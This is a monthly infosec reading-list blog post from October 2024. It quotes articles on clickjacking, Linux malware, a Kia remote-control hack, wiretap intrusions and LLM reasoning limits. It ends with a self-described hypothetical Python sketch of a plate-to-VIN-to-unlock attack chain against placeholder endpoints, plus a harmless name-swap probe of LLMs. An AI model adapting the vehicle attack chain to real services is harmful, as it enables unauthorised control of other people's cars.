Infosec Reading List - October 2024
On a monthly basis I publish my reading recommendations, which mainly focus on Information Security (InfoSec) and Outdoor Sports. All InfoSec Reading Lists can be found here. Text in italics represents quotes from the original article.
Quotes from the Twitterverse
N/A
InfoSec
- Comedian John Mulaney brutally roasts SF techies at Dreamforce - The comedian rounded out his Dreamforce appearance by thanking attendees “for the world you’re creating for my son … where he will never talk to an actual human again. Instead, a little cartoon Einstein will pop up and give him a sort of good answer and probably refer him to another chatbot.” - “We’re just two guys hitting Wiffle balls badly and yelling ‘Good job’ at each other,” he said. “It’s sort of the same energy here at Dreamforce.” - [link]
- Using YouTube to steal your files - And there we go, a one-click clickjacking attack that chains a Google Slides YouTube embed path traversal to three separate redirects to gain editor access on a Drive file/folder! - [link]
- perfctl: A Stealthy Malware Targeting Millions of Linux Servers - [link]
- Cloudflare blocks largest recorded DDoS attack peaking at 3.8Tbps - [link]
- Hacking Kia: Remotely Controlling Cars With Just a License Plate - The above four HTTP requests could be used to send commands to pretty much any Kia vehicle made after 2013 (see “Vehicles Affected” table for specifics) using only the license plate. - a purely hypothetical sketch of such a plate-to-command request chain follows after this list - [link]
- Microsoft’s largest ever security transformation detailed in new report - [link]
- U.S. Wiretap Systems Targeted in China-Linked Hack - A cyberattack tied to the Chinese government penetrated the networks of a swath of U.S. broadband providers, potentially accessing information from systems the federal government uses for court-authorized network wiretapping requests. - these privileged accounts are dangerous and should be strictly controlled; it also shows that backdoors will be used, whether by the intended party or by someone else - A person familiar with the attack said the U.S. government considered the intrusions to be historically significant and worrisome. - [link]
- LLMs don’t do formal reasoning - and that is a HUGE problem - “we found no evidence of formal reasoning in language models …. Their behavior is better explained by sophisticated pattern matching—so fragile, in fact, that changing names can alter results by ~10%!” - a minimal sketch of this name-swap probe follows after this list - [link]
- Engaging with Boards to improve the management of cyber security risk - [pdf] - Remember, it’s your job to advise; you can’t set the appetite for risk. That has to be done by the Board. - this guide does contain a lot of solid, baseline advice - [link]
- When it comes to security, LLMs are like Swiss cheese — and that’s going to cause huge problems - [link]
- OpenAI Is A Bad Business - yet the company says that it expects to make $11.6 billion in 2025 and $100 billion by 2029, a statement so egregious that I am surprised it’s not some kind of financial crime to say it out loud. - an interesting article that raises a lot of important and critical questions, e.g. If OpenAI — the most prominent name in all of generative AI — is only making a billion dollars a year from this, what does that say about the larger growth trajectory of this company, or actual usage of generative AI products? - And, if we’re honest, it still isn’t obvious why anyone should use ChatGPT in the first place, other than the fact everybody is talking about it. You can ask it to generate something — a picture, a few paragraphs, perhaps a question — and at that point say “cool” and move on. - Perhaps it’s the hallucination problem, or perhaps it’s just that generative AI isn’t something that produces particularly-interesting interactions with a user. While you could argue that “somebody can work out a really cool product,” it’s time to ask why Amazon, Google, Meta, OpenAI, Apple, and Microsoft have failed to make one in the last two years. - [link]
- Thinking Like an AI - [link]
- Large language models and data protection - [link]
- Microsoft Copilot: From Prompt Injection to Exfiltration of Personal Information - [link]
- Location tracking of phones is out of control. Here’s how to fight back. - [link]
- OpenAI, Google and Anthropic are struggling to build more advanced AI - The companies are facing several challenges. It’s become increasingly difficult to find new, untapped sources of high-quality, human-made training data that can be used to build more advanced AI systems. - [link]
- iPhones Seized by Cops Are Rebooting, and No One’s Sure Why - “If the iPhone was in the After First Unlock (AFU) state, the device returns to a Before First Unlock (BFU) state after the reboot. This can be very detrimental to the acquisition of digital evidence from devices that are not supported in any state outside of AFU.” - [link]
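Regarding the Kia write-up above: it boils down to a short chain of HTTP calls. The sketch below is purely illustrative, assuming made-up endpoint paths, hosts and parameters (it is not the actual Kia/owner-portal API from the article); it only shows the general shape of a "license plate to remote command" chain.

```python
# Illustrative sketch only: the host, endpoint paths, parameter names and the
# token flow below are made-up placeholders, NOT the real API from the article.
# They just show the shape of a "license plate -> remote command" attack chain.
import requests

BASE = "https://example-dealer-api.invalid"   # placeholder host
ATTACKER_EMAIL = "attacker@example.com"       # throwaway attacker account


def plate_to_vin(session: requests.Session, plate: str, state: str) -> str:
    # 1) Resolve the license plate to a VIN.
    r = session.get(f"{BASE}/vehicles/lookup", params={"plate": plate, "state": state})
    r.raise_for_status()
    return r.json()["vin"]


def register_account(session: requests.Session) -> str:
    # 2) Register a throwaway account and obtain a bearer token.
    r = session.post(f"{BASE}/accounts", json={"email": ATTACKER_EMAIL, "password": "..."})
    r.raise_for_status()
    return r.json()["token"]


def add_self_as_driver(session: requests.Session, token: str, vin: str) -> None:
    # 3) Attach the attacker account to the victim vehicle.
    r = session.post(f"{BASE}/vehicles/{vin}/drivers",
                     headers={"Authorization": f"Bearer {token}"},
                     json={"email": ATTACKER_EMAIL})
    r.raise_for_status()


def send_command(session: requests.Session, token: str, vin: str, command: str) -> None:
    # 4) Issue a remote command (e.g. unlock) against the vehicle.
    r = session.post(f"{BASE}/vehicles/{vin}/commands",
                     headers={"Authorization": f"Bearer {token}"},
                     json={"command": command})
    r.raise_for_status()


if __name__ == "__main__":
    s = requests.Session()
    vin = plate_to_vin(s, plate="ABC1234", state="CA")
    token = register_account(s)
    add_self_as_driver(s, token, vin)
    send_command(s, token, vin, "unlock")
```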
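And regarding the formal-reasoning item: a rough illustration of the name-swap fragility the paper describes is to ask the same grade-school word problem several times with only the person's name changed and compare the answers. In the sketch below, `query_llm` is a placeholder you have to wire up to whatever model client you use; it is not a real API call.

```python
# Minimal name-swap probe: same arithmetic word problem, different person names.
# A model doing formal reasoning should be indifferent to the name; the paper's
# point is that accuracy still shifts under such superficial edits.
import re

TEMPLATE = (
    "{name} picks {a} apples on Monday and {b} apples on Tuesday, "
    "then gives {c} apples away. How many apples does {name} have left? "
    "Answer with a single number."
)
NAMES = ["Sophie", "Liam", "Aisha", "Mateo"]
VALUES = {"a": 44, "b": 58, "c": 10}
EXPECTED = VALUES["a"] + VALUES["b"] - VALUES["c"]   # 92


def query_llm(prompt: str) -> str:
    """Placeholder: call whatever model/API you actually use and return its text."""
    raise NotImplementedError("plug in your model client here")


def extract_number(text: str) -> int | None:
    match = re.search(r"-?\d+", text)
    return int(match.group()) if match else None


def run_probe() -> None:
    correct = 0
    for name in NAMES:
        answer = extract_number(query_llm(TEMPLATE.format(name=name, **VALUES)))
        correct += answer == EXPECTED
        print(f"{name:>8}: got {answer}, expected {EXPECTED}")
    print(f"consistent correct answers: {correct}/{len(NAMES)}")


if __name__ == "__main__":
    run_probe()
```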
Outdoor
N/A
This post is licensed under CC BY 4.0 by the author.